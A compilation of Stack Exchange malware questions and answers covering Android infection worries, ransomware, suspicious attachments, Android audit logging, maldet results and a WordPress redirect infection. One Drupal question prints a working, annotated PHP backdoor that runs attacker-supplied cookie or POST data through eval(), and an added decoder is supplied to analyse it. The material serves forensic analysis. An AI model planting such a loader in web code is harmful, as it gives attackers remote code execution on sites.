Worried about possible malware – Android Enthusiasts Stack Exchange

I’m hoping someone can help me here. Yesterday I was doing some research for an essay when I clicked a website (very dumb of me, who never clicks suspicious websites or links) that redirected me. I immediately backed off; the page didn’t load. If anything, I spent about a second there. Being the paranoid person I am, I have Malwarebytes installed: scanned, clear. Avast, clear. Sophos warned me about a PUA, which was a .com.google.chrome(some letters) file. I immediately deleted it, but then again Sophos also warned me about another app being a PUA when it’s in fact safe.

I cleared the Google Chrome cache. I’d like to note that I DID NOT download anything, I didn’t click any links, I didn’t click anything but the back button, and I didn’t give any permissions. I’m on Android 10, Xiaomi Redmi Note 7 (encrypted), and updated to MIUI 12 last night. My phone isn’t acting odd or anything.

I’m just extremely worried about being infected. I checked that website on Hybrid Analysis, which came back as malicious (attack method: hooking); VirusTotal said the same, but Google Safe Browsing didn’t detect anything. This site was detected as malicious on 2-3 checkers. I was on Google Chrome at the time.
Should I be concerned?

I don’t do banking on my phone as I have a separate apple device for that.

Is there anything else I can do, for peace of mind? Thanks in advance.

drupal – How does this php malware code work?

I am trying to figure out what a PHP malware attack is doing.
It looks like the code got injected into PHP files throughout the application.
There are multiple files with weird names created.
All index.php files have an @include of a .ico file with more malicious code.
Here’s a piece of code I’ve unscrambled so far from one of the files:

<?php
// file: 69a37i3n.php
// only cookie I have seen: _ga=GA1.2.1548240392.1610697094
// every cookie and POST field is tried as a (parameter name, payload) pair
foreach (array_merge($_COOKIE, $_POST) as $pqvsj => $fvrzeet) {
    // keystream: parameter name + per-file UUID, repeated and cut to $xleag bytes
    function spqrmii($pqvsj, $xleag) {
        return substr(str_repeat($pqvsj . "98211dea-faaf-4f62-9b4b-5d1bdab21324", ($xleag / strlen($pqvsj)) + 1), 0, $xleag);
    }
    // hex-decode the parameter value; @ hides warnings about malformed hex
    function xafxt($hmlbuxx) {
        return @pack("H*", $hmlbuxx);
    }
    // gate: act only when the number of '#'-separated fields is a multiple of 3,
    // then run eval(field1(field2)), where field1 is a PHP function name, and stop
    function gzphbr($hmlbuxx) {
        $zomcez = count($hmlbuxx) % 3;
        if (!$zomcez) {
            // array index, not a call: "$hmlbuxx(1)" in the unscrambled copy would fatal
            eval($hmlbuxx[1]($hmlbuxx[2]));
            exit();
        }
    }
    $fvrzeet = xafxt($fvrzeet);
    // PHP string ^ is byte-wise XOR; the keystream is cut to the payload length
    gzphbr(explode("#", $fvrzeet ^ spqrmii($pqvsj, strlen($fvrzeet))));
}

It looks like the cookie contains a hex string that is evaluated as code throughout the site.
“98211dea-faaf-4f62-9b4b-5d1bdab21324” varies between the different injected PHP files.
At some point I’ll need to figure out how this got injected via Drupal 7, PHP 5, or some 3rd-party libs.

Thank you for your help!
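
To inspect what such a loader would execute for a captured request, here is an added Python decoder that is not part of the question or of Drupal; it mirrors the snippet’s three steps (hex decode, XOR with the name-plus-UUID keystream, split on “#”) and reports the callable and argument instead of running them. The parameter name “ab” and the hex value are constructed for the demo.

```python
"""Forensic decoder for the cookie-keyed loader above: added example, not code
from the question or from Drupal. It mirrors the loader's decoding steps so a
captured cookie/POST value can be inspected offline without calling eval().
The parameter name and sample hex below are constructed; the UUID is the one
in the snippet and changes per infected file."""
from binascii import unhexlify

SUFFIX = "98211dea-faaf-4f62-9b4b-5d1bdab21324"  # per-file constant from the snippet

def keystream(param_name, length, suffix=SUFFIX):
    """Mirror of spqrmii(): (name + suffix) repeated, cut to `length` bytes."""
    unit = (param_name + suffix).encode("latin-1")
    reps = length // len(param_name) + 1  # PHP divides by strlen(name), not the unit
    return (unit * reps)[:length]

def xor_bytes(data, key):
    """PHP's string ^ operator: byte-wise XOR over the common length."""
    return bytes(a ^ b for a, b in zip(data, key))

def decode_payload(param_name, hex_value, suffix=SUFFIX):
    """Mirror of xafxt() + XOR + explode('#'): returns the '#'-separated fields."""
    raw = unhexlify(hex_value)  # pack("H*", ...); raises on malformed hex
    plain = xor_bytes(raw, keystream(param_name, len(raw), suffix))
    return plain.decode("latin-1").split("#")

def describe(fields):
    """Mirror of gzphbr()'s gate: report what eval() would run, never run it."""
    if len(fields) % 3 != 0:
        return None  # gate fails, the loader falls through silently
    return {"callable": fields[1], "argument": fields[2]}

# Constructed sample: parameter "ab" whose value decodes to "1#strrev#;)1(ohce",
# i.e. the loader would execute eval(strrev(";)1(ohce")).
SAMPLE_NAME = "ab"
SAMPLE_HEX = "50414a4c40435412465a0457490e0e4e51"

if __name__ == "__main__":
    fields = decode_payload(SAMPLE_NAME, SAMPLE_HEX)
    print(fields, describe(fields))
```

Run it against values taken from the web server’s access logs (the cookie or POST field as logged) together with the UUID from the specific infected file, since each file uses a different suffix.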

malware – How to remove IGAL ransomware

You don’t remove ransomware, because when you know ransomware is on your system, it’s already too late. You either have good backups in place, or you keep from getting infected. What you can do is recover from the damage.

Whether you can recover the files without paying depends on how the ransomware was built. Earlier versions had issues with the crypto setup and sometimes you could recover the files without paying, but those cases are getting rarer every day.

You can wait to see if someone breaks its encryption, or pay for the key. There’s no other way.

malware – How to determine if a PC is safe after receiving a suspicious email message

I was checking my gmail account spam folder and I noticed an email sent by a known sender.

I thought it was flagged as spam by mistake so I opened it. Then I realized the content is the same as another email I sent the same person about a month ago. Even the subject is the same.

The sender’s name is correct, but I checked the headers and the actual address is not the sender’s. I checked it on various blacklist search engines, but apparently it came back clean; WHOIS has redacted data for privacy reasons, but it seems to be just a case of spoofing.

The message also has an encrypted .zip file attached that was not present in the original mail. In the message there’s a password to open the .zip file but there’s no way I’m going to open the thing on my PC.

The mail content is pretty spooky, though. I mean, it’s an email I sent and supposedly only the receiver and me knew about it. I want to make sure there’s nothing wrong with my account/devices. I’m wondering if the mail was “stolen” through malware on one of my devices, or on the other person’s. We both used gmail accounts.

I safely store my passwords using appropriate encryption software (KeePass) and have 2FA enabled, and I’m pretty cautious when browsing and checking my mail (stuff like checking link URLs before opening them). The other person, on the other hand, stores his passwords in a plain text file (I literally saw him open it), so I suppose his security could be pretty lacking.

What should I do in this situation? How could I inspect the content of the .zip file without exposing my machine and/or my personal data? I was thinking of installing some Linux distro on a virtual machine to check it out. Should I download the file on my PC and transfer it to the machine? Or should I open Gmail from inside the machine itself and download the attachment? I’m worried that the former method could expose my PC, while the latter could allow the collection of personal data.

malware – How to identify the app/process which re-mounts partitions R/W, creates files and changes file permissions?

Note: The following solution requires a rooted device. The kernel must be built with AUDIT_WATCH, preferably AUDIT_TREE.

The only good thing Google did was to choose the flexible and configurable Linux kernel for Android, not going for something like a crippled kernel and trying to handle everything from userspace, including running a Linux kernel (1).

The Linux kernel’s Audit System makes it possible to log any system calls or filesystem changes made by a process. In our case we need to identify the process(es) that are writing to /sdcard or /system and making the mount and chmod syscalls.

Linux distributions have a service, auditd, which communicates with the kernel to get information about security-related events. On Android we already have logd, not as configurable as auditd but enough for basic monitoring. logd mainly covers the functionality of its desktop counterpart syslogd, but also includes klogd and partially auditd to get logs from the kernel’s SELinux subsystem.

We can add a few more rules using auditctl to also report the events we are interested in. You can use auditctl from a minimal Linux environment on your Android device, compile the binary from source code (it should be built with --with-arm or --with-aarch64, whichever your device’s architecture is), or get a pre-compiled one here.

Now create the rules files in /etc or wherever you want:

# /etc/audit-start.rules

# enable auditing, won't work in PID namespace
# won't work if permanently disabled with kernel parameter "audit=0"
-e 1

# delete previous rules (though there are none on Android)
-D

# increase the buffers to avoid failure
# number of events to be queued, waiting for logd to read them
-b 10000

# disable rate limit (msgs/sec) to avoid failure
-r 0

# this determines how long to wait in burst of events
--backlog_wait_time 0

# set failure mode to dmesg
-f 1

# define filesystem rules, whatever file/directory you want to watch
-w /system -p wa -k FILESYSTEM_AUDIT

# define syscall rules, see all syscalls with 'ausyscall --dump' or
# here: github.com/linux-audit/audit-userspace/blob/master/lib/aarch64_table.h
-a always,exit -S fchmod -S fchmodat -k CHMOD_AUDIT
-a always,exit -S mount -k MOUNT_AUDIT

# /etc/audit-stop.rules

# clear on exit, restore Android default values
-e 0
-D
-b 64
-r 5
--backlog_wait_time 18000

Apply rules:

~# auditctl -R /etc/audit-start.rules

Now make changes; mount /system R/W, write/delete something there and change file permissions.

Depending on the logd configuration, you can get the audit log in one or more of several logs (2), including logcat’s events buffer (3) and main buffer (4):

~# logcat -d -b events,main | grep _AUDIT

Or in the kernel’s printk buffer (5) and logcat’s kernel buffer (6):

~# dmesg | grep _AUDIT
~# logcat -d -b kernel | grep _AUDIT
audit(0.0:16122): arch=c00000b7 syscall=40 success=yes exit=0 a0=7fcec5db38 a1=7fcec5db3f a2=0 a3=8021 items=1 ppid=761 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="busybox" exe="/data/data/com.mixplorer/files/busybox/busybox" subj=u:r:magisk:s0 key="MOUNT_AUDIT"
audit(0.0:16126): arch=c00000b7 syscall=53 success=yes exit=0 a0=ffffff9c a1=7b839180c0 a2=81a4 a3=0 items=1 ppid=11687 auid=4294967295 uid=10135 gid=10135 euid=10135 suid=10135 fsuid=10135 egid=10135 sgid=10135 fsgid=10135 tty=(none) ses=4294967295 comm="Thread-7" exe="/system/bin/app_process64" subj=u:r:untrusted_app:s0:c135,c256,c512,c768 key="CHMOD_AUDIT"
audit(0.0:16141): arch=c00000b7 syscall=35 success=yes exit=0 a0=ffffff9c a1=7bc22a3c40 a2=0 a3=7bdfbd3098 items=2 ppid=11687 auid=4294967295 uid=10135 gid=10135 euid=10135 suid=10135 fsuid=10135 egid=10135 sgid=10135 fsgid=10135 tty=(none) ses=4294967295 comm="pool-2-thread-1" exe="/system/bin/app_process64" subj=u:r:untrusted_app:s0:c135,c256,c512,c768 key="FILESYSTEM_AUDIT"

The first line shows that some process running as root with Magisk’s SELinux context has made syscall 40 (mount), and the command shows it’s the MiXplorer app (just as an example, I did that myself).
The second line indicates that the app running with UID 10135 has chmoded something.
The third line shows the same app (by making syscall 35) deleted something in the /system partition.

This is a simple use case. More recursive rules can be defined to deal with complex situations, interpreting other fields of the log as well, as explained here.

To clear rules:

~# auditctl -R /etc/audit-stop.rules

NOTE:

  • For simple cases where the objective is just to get notified of some filesystem changes (and not to trace the originator), the inotify API can be used instead, as explained in this answer.
  • In order to mark all the processes that run before the audit starts as auditable by the kernel, pass the audit=1 boot parameter to the kernel, either by editing the cmdline in boot.img or by using the fastboot -c option.
  • To save the audit log to a file, run logcat in the background:

    logcat -s auditd -b events -f /data/media/0/auditd.log &
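
An added example, not part of the answer: a small Python triage script that parses the _AUDIT records shown above, names the aarch64 syscalls from their numbers and groups successful events by UID and executable so the originating process stands out. The syscall table is limited to the numbers these rules produce, and the sample records are the three quoted in the answer.

```python
"""Triage helper for the _AUDIT records above: added example, not part of the
answer. Parses the records logcat/dmesg print, names the aarch64 syscalls the
rules produce and groups successful events by UID and executable."""
import re
from collections import defaultdict

# asm-generic numbers, valid only for arch=c00000b7 (AUDIT_ARCH_AARCH64)
AARCH64_SYSCALLS = {35: "unlinkat", 40: "mount", 52: "fchmod", 53: "fchmodat"}
HEADER_RE = re.compile(r"audit\([\d.]+:(\d+)\):")
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
AID_APP_START, AID_APP_END, AID_USER_OFFSET = 10000, 19999, 100000  # Android UIDs

def parse_audit_line(line):
    """Return the fields of one audit record as a dict, or None if not one."""
    m = HEADER_RE.search(line)
    if not m:
        return None
    f = {k: v.strip('"') for k, v in FIELD_RE.findall(line[m.end():])}
    if f.get("arch") != "c00000b7":
        return None  # other arch: the numbers would name different syscalls
    nr, uid = int(f.get("syscall", -1)), int(f.get("uid", -1))
    return {"serial": int(m.group(1)),
            "syscall": AARCH64_SYSCALLS.get(nr, f"nr{nr}"),
            "success": f.get("success") == "yes",
            "uid": uid, "is_app": AID_APP_START <= uid % AID_USER_OFFSET <= AID_APP_END,
            "comm": f.get("comm", ""), "exe": f.get("exe", ""),
            "subj": f.get("subj", ""), "key": f.get("key", "")}

def originators(lines):
    """Map (uid, exe) -> sorted 'KEY:syscall' strings of successful events."""
    groups = defaultdict(set)
    for ev in map(parse_audit_line, lines):
        if ev and ev["success"]:
            groups[(ev["uid"], ev["exe"])].add(f'{ev["key"]}:{ev["syscall"]}')
    return {k: sorted(v) for k, v in groups.items()}

# The three records quoted in the answer (kernel buffer format, no logcat prefix)
SAMPLE_LOG = [
    'audit(0.0:16122): arch=c00000b7 syscall=40 success=yes exit=0 a0=7fcec5db38 a1=7fcec5db3f a2=0 a3=8021 items=1 ppid=761 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="busybox" exe="/data/data/com.mixplorer/files/busybox/busybox" subj=u:r:magisk:s0 key="MOUNT_AUDIT"',
    'audit(0.0:16126): arch=c00000b7 syscall=53 success=yes exit=0 a0=ffffff9c a1=7b839180c0 a2=81a4 a3=0 items=1 ppid=11687 auid=4294967295 uid=10135 gid=10135 euid=10135 suid=10135 fsuid=10135 egid=10135 sgid=10135 fsgid=10135 tty=(none) ses=4294967295 comm="Thread-7" exe="/system/bin/app_process64" subj=u:r:untrusted_app:s0:c135,c256,c512,c768 key="CHMOD_AUDIT"',
    'audit(0.0:16141): arch=c00000b7 syscall=35 success=yes exit=0 a0=ffffff9c a1=7bc22a3c40 a2=0 a3=7bdfbd3098 items=2 ppid=11687 auid=4294967295 uid=10135 gid=10135 euid=10135 suid=10135 fsuid=10135 egid=10135 sgid=10135 fsgid=10135 tty=(none) ses=4294967295 comm="pool-2-thread-1" exe="/system/bin/app_process64" subj=u:r:untrusted_app:s0:c135,c256,c512,c768 key="FILESYSTEM_AUDIT"',
]

if __name__ == "__main__":
    for (uid, exe), actions in originators(SAMPLE_LOG).items():
        print(uid, exe, actions)
```

Feed it the output of `logcat -d -b kernel | grep _AUDIT` (or the saved auditd.log); for an app UID, `pm list packages --uid <uid>` resolves the package name behind app_process64.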

malware – How I can read and handle MS Office documents, such as doc/ppt files, securely?

I’ve heard of too many horror stories of people opening a seemingly innocent docx or pptx file that they’ve got from a business partner, only to find out that it had embedded malware inside. What should a security conscious person do if they receive a doc or a ppt file that they wish to see the contents of, but cannot guarantee the reliability of its source? Is there any recommended practice to handle this, besides ‘don’t do it’?

malware – Cannot interpret maldet results

After executing sudo maldet -a /,

LMD provides the following report:

HOST:      foo.bar.baz
SCAN ID:   210117-2223.1145531
STARTED:   Jan 17 2021 22:23:26 +0000
COMPLETED: Jan 18 2021 22:01:12 +0000
ELAPSED:   85066s [find: 42s]

PATH:          /
TOTAL FILES:   579780
TOTAL HITS:    2
TOTAL CLEANED: 0

WARNING: Automatic quarantine is currently disabled, detected threats are still accessible to users!
To enable, set quarantine_hits=1 and/or to quarantine hits from this scan run:
/usr/local/sbin/maldet -q 210117-2223.1145531

FILE HIT LIST:
{HEX}php.cmdshell.antichat.201 : /home/foo/maldetect-1.6.4/files/sigs/rfxn.yara
{HEX}php.gzbase64.inject.452 : /home/foo/maldetect-1.6.4/files/clean/gzbase64.inject.unclassed
===============================================
Linux Malware Detect v1.6.4 < proj@rfxn.com >

I struggle to interpret the results of the two hits. Is it in the home directory and what does HEX mean?

Can’t find cause of malware in WordPress site – adding html files with redirects

I’m helping a non-profit and they have had malware on their WordPress site. I installed Sucuri and it quickly finds some strangely named HTML files in the base directory. I removed those files. Because of the malware found, the non-profit was blacklisted on 3 different spam sites (mxlookup search). I had updated all of their plugins, WordPress software, themes. I had removed unused themes and removed other users. They finally got off of the blacklists, but then today Sucuri found another malware file.

The file is always in the base WordPress directory and named with random characters (e.g., QPez2ejsEdss.html), and its contents are this:

<meta http-equiv="refresh" content="0;http://SOME_STRANGE_WEBSITE/">

Where SOME_STRANGE_WEBSITE is clearly a bad website.

What tools can I use to find the dropper of the malware?

antimalware – How to check for malware before downloading a torrent file?

I wanted to know if there is a way to check whether a torrent file has malware or not before actually downloading it via uTorrent, for example.

I only know the VirusTotal site. Is this one reliable? Because each time I paste a link into it, it says that the link/file is safe. So I don’t know if every single link/file I paste on VirusTotal is clean and safe or the site just doesn’t detect malware well.

Best option for me would be to have a way to check it on the web without downloading 3rd party apps.